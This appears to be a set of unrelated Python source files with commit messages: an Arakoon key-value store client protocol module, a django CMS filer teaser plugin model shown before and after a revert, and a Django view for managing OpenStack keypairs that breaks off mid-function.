buffer = _recvString(con)
result, offset = _unpackNamedField(buffer,0)
return result['arakoon_stats']
@staticmethod
def decodeVersionResult(con):
ArakoonProtocol._evaluateErrorCode(con)
major = _recvInt(con)
minor = _recvInt(con)
patch = _recvInt(con)
info = _recvString(con)
return (major,minor, patch, info)
@staticmethod
def encodeGetKeyCount () :
return _packInt(ARA_CMD_KEY_COUNT)
@staticmethod
def encodeGetNurseryCfg ():
return _packInt(ARA_CMD_GET_NURSERY_CFG)
python client: SocketNotReadable now has peername in message
"""
This file is part of Arakoon, a distributed key-value store. Copyright
(C) 2010 Incubaid BVBA
Licensees holding a valid Incubaid license may use this file in
accordance with Incubaid's Arakoon commercial license agreement. For
more information on how to enter into this agreement, please contact
Incubaid (contact details can be found on www.arakoon.org/licensing).
Alternatively, this file may be redistributed and/or modified under
the terms of the GNU Affero General Public License version 3, as
published by the Free Software Foundation. Under this license, this
file is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
FITNESS FOR A PARTICULAR PURPOSE.
See the GNU Affero General Public License for more details.
You should have received a copy of the
GNU Affero General Public License along with this program (file "COPYING").
If not, see <http://www.gnu.org/licenses/>.
"""
"""
Module implementing the Arakoon protocol
"""
from ArakoonExceptions import *
from ArakoonValidators import SignatureValidator
from NurseryRouting import RoutingInfo
import struct
import logging
import select
import cStringIO
import types
FILTER = ''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in range(256)])
ARA_CFG_TRY_CNT = 1
ARA_CFG_CONN_TIMEOUT = 60
ARA_CFG_CONN_BACKOFF = 5
ARA_CFG_NO_MASTER_RETRY = 60
class ArakoonClientConfig :
def __init__ (self, clusterId, nodes):
"""
Constructor of an ArakoonClientConfig object
The constructor takes one optional parameter 'nodes'.
This is a dictionary containing info on the arakoon server nodes. It contains:
- nodeids as keys
- ([ip], port) as values
e.g. ::
cfg = ArakoonClientConfig ('ricky',
{ "myFirstNode" : (["127.0.0.1"], 4000 ),
"mySecondNode" :(["127.0.0.1"], 5000 ),
"myThirdNode" :(["127.0.0.1","10.0.0.1"], 6000 )] })
@type clusterId: string
@param clusterId: name of the cluster
@type nodes: dict
@param nodes: A dictionary containing the locations for the server nodes
"""
self._clusterId = clusterId
self._nodes = self._cleanUp(nodes)
def _cleanUp(self, nodes):
for k in nodes.keys():
t = nodes[k]
maybe_string = t[0]
if type(maybe_string) == types.StringType:
ip_list = maybe_string.split(',')
port = t[1]
nodes[k] = (ip_list, port)
return nodes
def __str__(self):
r = "ArakoonClientConfig(%s,%s)" % (self._clusterId,
str(self._nodes))
return r
@staticmethod
def getNoMasterRetryPeriod() :
"""
Retrieve the period messages to the master should be retried when a master re-election occurs
This period is specified in seconds
@rtype: integer
@return: Returns the retry period in seconds
"""
return ARA_CFG_NO_MASTER_RETRY
def getNodeLocations(self, nodeId):
"""
Retrieve location of the server node with give node identifier
A location is a pair consisting of a hostname or ip address as first element.
The second element of the pair is the tcp port
@type nodeId: string
@param nodeId: The node identifier whose location you are interested in
@rtype: pair(string,int)
@return: Returns a pair with the nodes hostname or ip and the tcp port, e.g. ("127.0.0.1", 4000)
"""
return self._nodes[ nodeId ]
def getTryCount (self):
"""
Retrieve the number of attempts a message should be tried before giving up
Can be controlled by changing the global variable L{ARA_CFG_TRY_CNT}
@rtype: integer
@return: Returns the max retry count.
"""
return ARA_CFG_TRY_CNT
def getNodes(self):
"""
Retrieve the dictionary with node locations
@rtype: dict
@return: Returns a dictionary mapping the node identifiers (string) to its location ( pair<string,integer> )
"""
return self._nodes
@staticmethod
def getConnectionTimeout():
"""
Retrieve the tcp connection timeout
Can be controlled by changing the global variable L{ARA_CFG_CONN_TIMEOUT}
@rtype: integer
@return: Returns the tcp connection timeout
"""
return ARA_CFG_CONN_TIMEOUT
@staticmethod
def getBackoffInterval():
"""
Retrieves the backoff interval.
If an attempt to send a message to the server fails,
the client will wait a random number of seconds. The maximum wait time is n*getBackoffInterVal()
with n being the attempt counter.
Can be controlled by changing the global variable L{ARA_CFG_CONN_BACKOFF}
@rtype: integer
@return: The maximum backoff interval
"""
return ARA_CFG_CONN_BACKOFF
def getClusterId(self):
return self._clusterId
class ArakoonClientLogger :
@staticmethod
def logWarning( msg, *args ):
logging.warning(msg, *args )
@staticmethod
def logError( msg, *args ):
logging.error( msg, *args )
@staticmethod
def logCritical( msg, *args ):
logging.critical( msg, *args )
@staticmethod
def logDebug ( msg, *args ):
logging.debug ( msg, *args )
def dump(src, length=8):
N = 0
result = ''
while src:
s, src = src[:length], src[length:]
hexa = ' '.join(["%02X"%ord(x) for x in s])
s = s.translate(FILTER)
result += "%04X %-*s %s\n" % (N, length*3, hexa, s)
N += length
return result
# Define the size of an int in bytes
ARA_TYPE_INT64_SIZE = 8
ARA_TYPE_INT_SIZE = 4
ARA_TYPE_BOOL_SIZE = 1
# Magic used to mask each command
ARA_CMD_MAG = 0xb1ff0000
ARA_CMD_VER = 0x00000001
# Hello command
ARA_CMD_HEL = 0x00000001 | ARA_CMD_MAG
# Who is master?
ARA_CMD_WHO = 0x00000002 | ARA_CMD_MAG
# Existence of a value for a key
ARA_CMD_EXISTS = 0x00000007 | ARA_CMD_MAG
# Get a value
ARA_CMD_GET = 0x00000008 | ARA_CMD_MAG
# Update a value
ARA_CMD_SET = 0x00000009 | ARA_CMD_MAG
# Delete a key value pair
ARA_CMD_ASSERT = 0x00000016 | ARA_CMD_MAG
ARA_CMD_DEL = 0x0000000a | ARA_CMD_MAG
# Get a range of keys
ARA_CMD_RAN = 0x0000000b | ARA_CMD_MAG
# Get keys matching a prefix
ARA_CMD_PRE = 0x0000000c | ARA_CMD_MAG
# Test and set a value
ARA_CMD_TAS = 0x0000000d | ARA_CMD_MAG
# range entries
ARA_CMD_RAN_E = 0x0000000f | ARA_CMD_MAG
#sequence
ARA_CMD_SEQ = 0x00000010 | ARA_CMD_MAG
ARA_CMD_MULTI_GET = 0x00000011 | ARA_CMD_MAG
ARA_CMD_EXPECT_PROGRESS_POSSIBLE = 0x00000012 | ARA_CMD_MAG
ARA_CMD_STATISTICS = 0x00000013 | ARA_CMD_MAG
ARA_CMD_USER_FUNCTION = 0x00000015 | ARA_CMD_MAG
ARA_CMD_KEY_COUNT = 0x0000001a | ARA_CMD_MAG
ARA_CMD_CONFIRM = 0x0000001c | ARA_CMD_MAG
ARA_CMD_GET_NURSERY_CFG = 0x00000020 | ARA_CMD_MAG
ARA_CMD_REV_RAN_E = 0x00000023 | ARA_CMD_MAG
ARA_CMD_SYNCED_SEQUENCE = 0x00000024 | ARA_CMD_MAG
ARA_CMD_DELETE_PREFIX = 0x00000027 | ARA_CMD_MAG
ARA_CMD_VERSION = 0x00000028 | ARA_CMD_MAG
ARA_CMD_ASSERT_EXISTS = 0x00000029 | ARA_CMD_MAG
# Arakoon error codes
# Success
ARA_ERR_SUCCESS = 0
# No entity
ARA_ERR_NO_ENT = 1
# Node is not the master
ARA_ERR_NOT_MASTER = 4
# not found
ARA_ERR_NOT_FOUND = 5
# wrong cluster
ARA_ERR_WRONG_CLUSTER = 6
ARA_ERR_ASSERTION_FAILED = 7
ARA_ERR_RANGE_ERROR = 9
ARA_ERR_GOING_DOWN = 16
ARA_ERR_ASSERTEXISTS_FAILED = 17
NAMED_FIELD_TYPE_INT = 1
NAMED_FIELD_TYPE_INT64 = 2
NAMED_FIELD_TYPE_FLOAT = 3
NAMED_FIELD_TYPE_STRING = 4
NAMED_FIELD_TYPE_LIST = 5
def _packString( toPack ):
toPackLength = len( toPack )
return struct.pack("I%ds" % ( toPackLength), toPackLength, toPack )
def _packStringOption ( toPack = None ):
if toPack is None:
return _packBool ( 0 )
else :
return _packBool ( 1 ) + _packString (toPack)
def _packInt ( toPack ):
return struct.pack( "I", toPack )
def _packInt64 ( toPack ):
return struct.pack( "q", toPack )
def _packSignedInt ( toPack ):
return struct.pack( "i", toPack )
def _packBool ( toPack) :
return struct.pack( "?", toPack)
def sendPrologue(socket, clusterId):
p = _packInt(ARA_CMD_MAG)
p += _packInt(ARA_CMD_VER)
p += _packString(clusterId)
socket.sendall(p)
def _readExactNBytes( con, n ):
if not con._connected :
raise ArakoonSockRecvClosed()
bytesRemaining = n
tmpResult = ""
timeout = ArakoonClientConfig.getConnectionTimeout()
while bytesRemaining > 0 :
tripleList = select.select( [con._socket] , [] , [] , timeout )
if ( len ( tripleList [0]) != 0 ) :
newChunk = ""
try :
newChunk = tripleList [0][0].recv ( bytesRemaining)
except Exception, ex:
ArakoonClientLogger.logError ("Error while receiving from socket. %s: '%s'" % (ex.__class__.__name__, ex) )
con._connected = False
raise ArakoonSockRecvError()
newChunkSize = len( newChunk )
if newChunkSize == 0 :
try:
con._socket.close()
except Exception, ex:
ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
con._connected = False
raise ArakoonSockReadNoBytes ()
tmpResult = tmpResult + newChunk
bytesRemaining = bytesRemaining - newChunkSize
else :
try:
con._socket.close()
except Exception, ex:
ArakoonClientLogger.logError( "Error while closing socket. %s: %s" % (ex.__class__.__name__,ex))
con._connected = False
msg = con._socket.getpeername()
raise ArakoonSockNotReadable(msg = msg)
return tmpResult
def _recvString ( con ):
strLength = _recvInt( con )
buf = _readExactNBytes( con, strLength)
return struct.unpack( "%ds" % strLength, buf ) [0]
def _unpackInt(buf, offset):
r=struct.unpack_from( "I", buf,offset)
return r[0], offset + ARA_TYPE_INT_SIZE
def _unpackSignedInt(buf, offset):
r=struct.unpack_from( "i", buf,offset)
return r[0], offset + ARA_TYPE_INT_SIZE
def _unpackInt64(buf, offset):
r= struct.unpack_from("q", buf, offset)
return r[0], offset + 8
def _unpackString(buf, offset):
size,o2 = _unpackInt(buf, offset)
v = buf[o2:o2 + size]
return v, o2+size
def _unpackStringList(buf, offset):
size,offset = _unpackInt(buf, offset)
retVal = []
for i in range( size ) :
x, offset = _unpackString(buf, offset)
retVal.append(x)
return retVal, offset
def _unpackNamedField(buf, offset):
type, offset = _unpackInt(buf, offset)
name, offset = _unpackString(buf, offset)
result = dict()
if type == NAMED_FIELD_TYPE_INT:
result[name], offset = _unpackInt(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_INT64:
result[name], offset = _unpackInt64(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_FLOAT:
result[name], offset = _unpackFloat(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_STRING:
result[name], offset = _unpackString(buf,offset)
return result, offset
if type == NAMED_FIELD_TYPE_LIST:
length, offset = _unpackInt(buf,offset)
localDict = dict()
for i in range(length):
field, offset = _unpackNamedField(buf, offset)
localDict.update( field )
result[name] = localDict
return result, offset
raise ArakoonException("Cannot decode named field %s. Invalid type: %d" % (name,type) )
def _recvInt ( con ):
buf = _readExactNBytes ( con, ARA_TYPE_INT_SIZE )
i,o2 = _unpackInt(buf,0)
return i
def _recvInt64 ( con ):
buf = _readExactNBytes( con, ARA_TYPE_INT64_SIZE )
i,o2 = _unpackInt64(buf,0)
return i
def _unpackBool(buf, offset):
r = struct.unpack_from( "?", buf, offset) [0]
return r, offset+1
def _recvBool ( con ):
buf = _readExactNBytes( con, 1 )
b, o2 = _unpackBool(buf,0)
return b
def _unpackFloat(buf, offset):
r = struct.unpack_from("d", buf, offset)
return r[0], offset+8
def _recvFloat(buf):
buf = _readExactNBytes(con, 8)
f,o2 = _unpackFloat(buf,0)
return f
def _recvStringOption ( con ):
isSet = _recvBool( con )
if( isSet ) :
return _recvString( con )
else :
return None
class Update(object):
pass
class Set(Update):
def __init__(self,key,value):
self._key = key
self._value = value
def write(self, fob):
fob.write(_packInt(1))
fob.write(_packString(self._key))
fob.write(_packString(self._value))
class Delete(Update):
def __init__(self,key):
self._key = key
def write(self, fob):
fob.write(_packInt(2))
fob.write(_packString(self._key))
class Assert(Update):
def __init__(self, key, vo):
self._key = key
self._vo = vo
def write(self, fob):
fob.write(_packInt(8))
fob.write(_packString(self._key))
fob.write(_packStringOption(self._vo))
class AssertExists(Update):
def __init__(self, key):
self._key = key
def write(self, fob):
fob.write(_packInt(15))
fob.write(_packString(self._key))
class Sequence(Update):
def __init__(self):
self._updates = []
def addUpdate(self,u):
self._updates.append(u)
@SignatureValidator( 'string', 'string' )
def addSet(self, key,value):
self._updates.append(Set(key,value))
@SignatureValidator( 'string' )
def addDelete(self, key):
self._updates.append(Delete(key))
def addAssert(self, key,vo):
self._updates.append(Assert(key,vo))
def addAssertExists(self, key):
self._updates.append(AssertExists(key))
def write(self, fob):
fob.write( _packInt(5))
fob.write( _packInt(len(self._updates)))
for update in self._updates:
update.write(fob)
class ArakoonProtocol :
@staticmethod
def encodePing(clientId, clusterId ):
r = _packInt(ARA_CMD_HEL)
r += _packString(clientId)
r += _packString(clusterId)
return r
@staticmethod
def encodeGetVersion():
r = _packInt(ARA_CMD_VERSION)
return r
@staticmethod
def encodeWhoMaster():
return _packInt( ARA_CMD_WHO )
@staticmethod
def encodeExists(key, allowDirty):
msg = _packInt(ARA_CMD_EXISTS)
msg += _packBool(allowDirty)
msg += _packString(key)
return msg
@staticmethod
def encodeAssert(key, vo, allowDirty):
msg = _packInt(ARA_CMD_ASSERT)
msg += _packBool(allowDirty)
msg += _packString(key)
msg += _packStringOption(vo)
return msg
@staticmethod
def encodeAssertExists(key, allowDirty):
print "encodeAE"
msg = _packInt(ARA_CMD_ASSERT_EXISTS)
msg += _packBool(allowDirty)
msg += _packString(key)
return msg
@staticmethod
def encodeGet(key , allowDirty):
msg = _packInt(ARA_CMD_GET)
msg += _packBool(allowDirty)
msg += _packString(key)
return msg
@staticmethod
def encodeSet( key, value ):
return _packInt( ARA_CMD_SET ) + _packString( key ) + _packString ( value )
@staticmethod
def encodeConfirm(key, value):
return _packInt(ARA_CMD_CONFIRM) + _packString(key) + _packString(value)
@staticmethod
def encodeSequence(seq, sync):
r = cStringIO.StringIO()
seq.write(r)
flattened = r.getvalue()
r.close()
cmd = ARA_CMD_SEQ
if sync:
cmd = ARA_CMD_SYNCED_SEQUENCE
return _packInt(cmd) + _packString(flattened)
@staticmethod
def encodeDelete( key ):
return _packInt ( ARA_CMD_DEL ) + _packString ( key )
@staticmethod
def encodeRange( bKey, bInc, eKey, eInc, maxCnt , allowDirty):
retVal = _packInt( ARA_CMD_RAN ) + _packBool(allowDirty)
retVal += _packStringOption( bKey ) + _packBool ( bInc )
retVal += _packStringOption( eKey ) + _packBool (eInc) + _packSignedInt (maxCnt)
return retVal
@staticmethod
def encodeRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
r = _packInt(ARA_CMD_RAN_E) + _packBool(allowDirty)
r += _packStringOption(first) + _packBool(finc)
r += _packStringOption(last) + _packBool(linc)
r += _packSignedInt(maxEntries)
return r
@staticmethod
def encodeReverseRangeEntries(first, finc, last, linc, maxEntries, allowDirty):
r = _packInt(ARA_CMD_REV_RAN_E) + _packBool(allowDirty)
r += _packStringOption(first) + _packBool(finc)
r += _packStringOption(last) + _packBool(linc)
r += _packSignedInt(maxEntries)
return r
@staticmethod
def encodePrefixKeys( key, maxCnt, allowDirty ):
retVal = _packInt( ARA_CMD_PRE) + _packBool(allowDirty)
retVal += _packString( key )
retVal += _packSignedInt( maxCnt )
return retVal
@staticmethod
def encodeTestAndSet( key, oldVal, newVal ):
retVal = _packInt( ARA_CMD_TAS ) + _packString( key )
retVal += _packStringOption( oldVal )
retVal += _packStringOption( newVal )
return retVal
@staticmethod
def encodeMultiGet(keys, allowDirty):
retVal = _packInt(ARA_CMD_MULTI_GET) + _packBool(allowDirty)
retVal += _packInt(len(keys))
for key in keys:
retVal += _packString(key)
return retVal
@staticmethod
def encodeExpectProgressPossible():
retVal = _packInt(ARA_CMD_EXPECT_PROGRESS_POSSIBLE)
return retVal
@staticmethod
def encodeStatistics():
retVal = _packInt(ARA_CMD_STATISTICS)
return retVal
@staticmethod
def encodeUserFunction(name, argument):
retVal = _packInt(ARA_CMD_USER_FUNCTION)
retVal += _packString(name)
retVal += _packStringOption(argument)
return retVal
@staticmethod
def encodeDeletePrefix(prefix):
retVal = _packInt(ARA_CMD_DELETE_PREFIX)
retVal += _packString(prefix)
return retVal
@staticmethod
def _evaluateErrorCode( con ):
errorCode = _recvInt ( con )
# """ ArakoonException( "Received invalid response from the server" )"""
if errorCode == ARA_ERR_SUCCESS :
return
else :
errorMsg = _recvString ( con )
if errorCode == ARA_ERR_NOT_FOUND:
raise ArakoonNotFound(errorMsg)
if errorCode == ARA_ERR_NOT_MASTER:
raise ArakoonNodeNotMaster()
if errorCode == ARA_ERR_ASSERTION_FAILED:
raise ArakoonAssertionFailed(errorMsg)
if errorCode == ARA_ERR_ASSERTEXISTS_FAILED:
raise ArakoonAssertExistsFailed(errorMsg)
if errorCode == ARA_ERR_RANGE_ERROR:
raise NurseryRangeError(errorMsg)
if errorCode == ARA_ERR_GOING_DOWN:
raise ArakoonGoingDown(errorMsg)
if errorCode != ARA_ERR_SUCCESS:
raise ArakoonException( "EC=%d. %s" % (errorCode, errorMsg) )
@staticmethod
def decodeInt64Result( con ) :
ArakoonProtocol._evaluateErrorCode( con )
return _recvInt64( con )
@staticmethod
def decodeIntResult(con):
ArakoonProtocol._evaluateErrorCode(con)
return _recvInt(con)
@staticmethod
def decodeVoidResult( con ):
ArakoonProtocol._evaluateErrorCode( con )
@staticmethod
def decodeBoolResult( con ):
ArakoonProtocol._evaluateErrorCode( con )
return _recvBool( con )
@staticmethod
def decodeStringResult ( con ):
ArakoonProtocol._evaluateErrorCode( con )
return _recvString( con )
@staticmethod
def decodeStringOptionResult ( con ):
ArakoonProtocol._evaluateErrorCode( con )
return _recvStringOption( con )
@staticmethod
def decodeStringListResult( con ):
ArakoonProtocol._evaluateErrorCode( con )
retVal = []
arraySize = _recvInt( con )
for i in range( arraySize ) :
retVal[:0] = [ _recvString( con ) ]
return retVal
@staticmethod
def decodeNurseryCfgResult( con ):
ArakoonProtocol._evaluateErrorCode(con)
offset = 0
encoded = _recvString( con )
routing, offset = RoutingInfo.unpack(encoded, offset, _unpackBool, _unpackString)
cfgCount, offset = _unpackInt(encoded, offset)
resultCfgs = {}
for i in range(cfgCount) :
clusterId, offset = _unpackString(encoded, offset)
clusterSize, offset = _unpackInt(encoded, offset)
cfg = dict()
for j in range(clusterSize):
nodeId, offset = _unpackString(encoded, offset)
ips, offset = _unpackStringList(encoded, offset)
port, offset = _unpackInt(encoded, offset)
cfg[nodeId] = (ips,port)
cliCfg = ArakoonClientConfig(clusterId, cfg)
resultCfgs[clusterId] = cliCfg
return (routing, resultCfgs)
@staticmethod
def decodeStringPairListResult(con):
ArakoonProtocol._evaluateErrorCode(con)
result = []
size = _recvInt( con )
for i in range(size):
k = _recvString ( con )
v = _recvString ( con )
result [:0] = [(k, v)]
return result
@staticmethod
def decodeStatistics(con):
ArakoonProtocol._evaluateErrorCode(con)
buffer = _recvString(con)
result, offset = _unpackNamedField(buffer,0)
return result['arakoon_stats']
@staticmethod
def decodeVersionResult(con):
ArakoonProtocol._evaluateErrorCode(con)
major = _recvInt(con)
minor = _recvInt(con)
patch = _recvInt(con)
info = _recvString(con)
return (major,minor, patch, info)
@staticmethod
def encodeGetKeyCount () :
return _packInt(ARA_CMD_KEY_COUNT)
@staticmethod
def encodeGetNurseryCfg ():
return _packInt(ARA_CMD_GET_NURSERY_CFG)
|
from django.utils.translation import ugettext_lazy as _
from django.db import models
from cms.models import CMSPlugin
from cms.models.fields import PageField
from filer.fields.image import FilerImageField
from django.conf import settings
CMSPLUGIN_FILER_TEASER_STYLE_CHOICES = getattr( settings, 'CMSPLUGIN_FILER_TEASER_STYLE_CHOICES',() )
class FilerTeaser(CMSPlugin):
"""
A Teaser
"""
title = models.CharField(_("title"), max_length=255, blank=True)
image = FilerImageField(_("image"), blank=True, null=True)
image_url = models.URLField(_("alternative image url"), verify_exists=False, null=True, blank=True, default=None)
style = models.CharField(_("teaser style"), max_length=255, null=True, blank=True, choices=CMSPLUGIN_FILER_TEASER_STYLE_CHOICES)
use_autoscale = models.BooleanField(_("use automatic scaling"), default=True,
help_text=_('tries to auto scale the image based on the placeholder context'))
width = models.PositiveIntegerField(_("width"), null=True, blank=True)
height = models.PositiveIntegerField(_("height"), null=True, blank=True)
free_link = models.CharField(_("link"), max_length=255, blank=True, null=True, help_text=_("if present image will be clickable"))
page_link = PageField(verbose_name=_("page"), null=True, blank=True, help_text=_("if present image will be clickable"))
description = models.TextField(_("description"), blank=True, null=True)
target_blank = models.BooleanField(_("open link in new window"), default=False)
def clean(self):
from django.core.exceptions import ValidationError
# Make sure that either image or image_url is set
if self.image and self.image_url:
raise ValidationError(_('Either an image or an image url must be selected.'))
def __unicode__(self):
return self.title
@property
def link(self):
try:
if self.free_link:
return self.free_link
elif self.page_link and self.page_link:
return self.page_link.get_absolute_url()
else:
return ''
except Exception, e:
print e
Revert "added missing field names translation strings"
This reverts commit 2e3bd0f874b850f61da080bb03ab6949aeebe2a6.
from django.utils.translation import ugettext_lazy as _
from django.db import models
from cms.models import CMSPlugin
from cms.models.fields import PageField
from filer.fields.image import FilerImageField
from django.conf import settings
CMSPLUGIN_FILER_TEASER_STYLE_CHOICES = getattr( settings, 'CMSPLUGIN_FILER_TEASER_STYLE_CHOICES',() )
class FilerTeaser(CMSPlugin):
"""
A Teaser
"""
title = models.CharField(_("title"), max_length=255, blank=True)
image = FilerImageField(blank=True, null=True)
image_url = models.URLField(_("alternative image url"), verify_exists=False, null=True, blank=True, default=None)
style = models.CharField(_("teaser style"), max_length=255, null=True, blank=True, choices=CMSPLUGIN_FILER_TEASER_STYLE_CHOICES)
use_autoscale = models.BooleanField(_("use automatic scaling"), default=True,
help_text=_('tries to auto scale the image based on the placeholder context'))
width = models.PositiveIntegerField(null=True, blank=True)
height = models.PositiveIntegerField(null=True, blank=True)
free_link = models.CharField(_("link"), max_length=255, blank=True, null=True, help_text=_("if present image will be clickable"))
page_link = PageField(verbose_name=_("page"), null=True, blank=True, help_text=_("if present image will be clickable"))
description = models.TextField(_("description"), blank=True, null=True)
target_blank = models.BooleanField(_("open link in new window"), default=False)
def clean(self):
from django.core.exceptions import ValidationError
# Make sure that either image or image_url is set
if self.image and self.image_url:
raise ValidationError(_('Either an image or an image url must be selected.'))
def __unicode__(self):
return self.title
@property
def link(self):
try:
if self.free_link:
return self.free_link
elif self.page_link and self.page_link:
return self.page_link.get_absolute_url()
else:
return ''
except Exception, e:
print e
|
from django.http import HttpResponse
from django.http import StreamingHttpResponse
from django.core.exceptions import PermissionDenied
from django.shortcuts import render, redirect
import glintwebui.config as config
from .__version__ import version
from .db_util import get_db_base_and_session
from .utils import get_keypair, delete_keypair, transfer_keypair, create_keypair, create_new_keypair
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
def manage_keys(request, group_name=None, message=None):
if not verifyUser(request):
raise PermissionDenied
user_obj = getUser(request)
if group_name is None:
group_name = user_obj.active_group
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
User_Group = Base.classes.csv2_user_groups
user_groups = session.query(User_Group).filter(User_Group.username == user_obj.username)
group_list = []
for grp in user_groups:
grp_name = grp.group_name
group_list.append(grp_name)
grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
key_dict = {}
num_clouds=0
for cloud in grp_resources:
num_clouds=num_clouds+1
for key in key_dict:
key_dict[key][cloud.cloud_name] = False
cloud_keys = session.query(Keypairs).filter(Keypairs.cloud_name == cloud.cloud_name, Keypairs.group_name == cloud.group_name)
for key in cloud_keys:
# issue of renaming here if keys have different names on different clouds
# the keys will have a unique fingerprint and that is what is used as an identifier
if (key.fingerprint + ";" + key.key_name) in key_dict:
dict_key = key.fingerprint + ";" + key.key_name
key_dict[dict_key][key.cloud_name] = True
else:
dict_key = key.fingerprint + ";" + key.key_name
key_dict[dict_key] = {}
key_dict[dict_key]["name"] = key.key_name
key_dict[dict_key][key.cloud_name] = True
context = {
"group_resources": grp_resources,
"key_dict": key_dict,
"active_group": group_name,
"message": message,
"enable_glint": True,
"user_groups": group_list,
"num_clouds": num_clouds
}
# need to create template
return render(request, 'glintwebui/manage_keys.html', context)
def upload_keypair(request, group_name=None):
if not verifyUser(request):
raise PermissionDenied
if request.method == 'POST':
# set up database objects
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
user = getUser(request)
# get list of target clouds to upload key to
cloud_name_list = request.POST.getlist('clouds')
key_name = request.POST.get("key_name")
key_string = request.POST.get("key_string")
grp = request.POST.get("group_name")
for cloud in cloud_name_list:
db_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).first()
try:
new_key = create_keypair(key_name=key_name, key_string=key_string, cloud=db_cloud)
except Exception as exc:
logger.error("Failed openstack request to make keypair")
logger.error(exc)
logger.error("%s is likely an invalid keystring" % key_string)
message = "unable to upload key: '%s' is likely an invalid keystring" % key_string
return manage_keys(request=request, group_name=grp, message=message)
keypair_dict = {
"group_name": grp,
"cloud_name": cloud,
"fingerprint": new_key.fingerprint,
"key_name": key_name
}
new_keypair = Keypairs(**keypair_dict)
session.merge(new_keypair)
try:
session.commit()
except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after creating new key")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
return redirect("manage_keys")
else:
#not a post do nothing
return None
return None
def new_keypair(request, group_name=None,):
if not verifyUser(request):
raise PermissionDenied
if request.method == 'POST':
# set up database objects
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
user = getUser(request)
# get list of target clouds to upload key to
cloud_name_list = request.POST.getlist('clouds')
key_name = request.POST.get("key_name")
grp = request.POST.get("group_name")
# Only check that needs to be made is if the key name is used on any of the target clouds
for cloud in cloud_name_list:
db_keypair = session.query(Keypairs).filter(Keypairs.group_name == grp, Keypairs.cloud_name == cloud, Keypairs.key_name == key_name).one_or_none()
if db_keypair is None:
#no entry exists, its safe to create this keypair
logging.info("creating new keypair %s on cloud %s" % (key_name, cloud))
#get grp resources obj
cloud_obj = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).one()
new_key = create_new_keypair(key_name=key_name, cloud=cloud_obj)
keypair_dict = {
"group_name": grp,
"cloud_name": cloud,
"fingerprint": new_key.fingerprint,
"key_name": key_name
}
new_keypair = Keypairs(**keypair_dict)
session.merge(new_keypair)
try:
session.commit()
except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after creating new key")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
else:
#keypair name exists on this cloud
message = "Keypair name %s in use on cloud: %s. Aborting transation, keypair may have been created on some clouds" % (key_name, cloud)
logger.error(message)
return manage_keys(request=request, group_name=grp, message=message)
return redirect("manage_keys")
else:
#not a post do nothing
return None
def save_keypairs(request, group_name=None, message=None):
if not verifyUser(request):
raise PermissionDenied
user_obj = getUser(request)
if group_name is None:
group_name = user_obj.active_group
if group_name is None:
return None
if request.method == 'POST':
try:
#set up database objects
Base, session = get_db_base_and_session()
Group_Resources = Base.classes.csv2_group_resources
Keypairs = Base.classes.csv2_keypairs
# get list of clouds for this group
# for each cloud: check_list = request.POST.getlist(cloud.cloud_name)
# check the checklist for diffs (add/remove keys)
grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
logger.info("Checking for keys to transfer")
for cloud in grp_resources:
#check_list will only have the names of keys checked for that cloud
check_list = request.POST.getlist(cloud.cloud_name)
#cross reference check list against what is in database:
cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
cloud_fingerprints = []
for keypair in cloud_keys:
cloud_fingerprints.append(keypair.fingerprint + ";" + keypair.key_name)
# check for new key transfers
for keypair_key in check_list:
if keypair_key not in cloud_fingerprints:
# transfer key to this cloud
logger.info("%s not found in %s" % (keypair_key, cloud_fingerprints))
logger.info("Found key: %s to transfer to %s" % (keypair_key, cloud.cloud_name))
split_key = keypair_key.split(";")
fingerprint = split_key[0]
key_name = split_key[1]
# get existing keypair: need name, public_key, key_type and ?user?
logger.info("getting source keypair database object...")
src_keypair = session.query(Keypairs).filter(Keypairs.fingerprint == fingerprint, Keypairs.key_name == key_name).first()
# get group resources corresponding to that keypair
logger.info("getting source cloud...")
src_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == src_keypair.group_name, Group_Resources.cloud_name == src_keypair.cloud_name).first()
# download key from that group resources
logger.info("getting source keypair openstack object...")
os_keypair = get_keypair(keypair_key, src_cloud)
# upload key to current "cloud"
logger.info("transferring keypair...")
transfer_keypair(os_keypair, cloud)
keypair_dict = {
"group_name": group_name,
"cloud_name": cloud.cloud_name,
"fingerprint": fingerprint,
"key_name": key_name
}
new_keypair = Keypairs(**keypair_dict)
session.merge(new_keypair)
try:
session.commit()
except Exception as exc:
logger.error(exc)
logger.error("Error committing database session after proccessing key transfers")
logger.error("openstack and the database may be out of sync until next keypair poll cycle")
# we need to do the entire loop of the clouds twice so we can do all the transfers, then all the deletes
logger.info("Checking for keys to delete")
for cloud in grp_resources:
#check_list will only have the names of keys checked for that cloud
check_list = request.POST.getlist(cloud.cloud_name)
#cross reference check list against what is in database:
cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
for keypair in cloud_keys:
if (keypair.fingerprint + ";" + keypair.key_name) not in check_list:
# key has been deleted from this cloud:
logger.info("Found key to delete: %s" % keypair.key_name)
delete_keypair(keypair.key_name, cloud)
# delete from database
session.delete(keypair)
try:
session.commit()
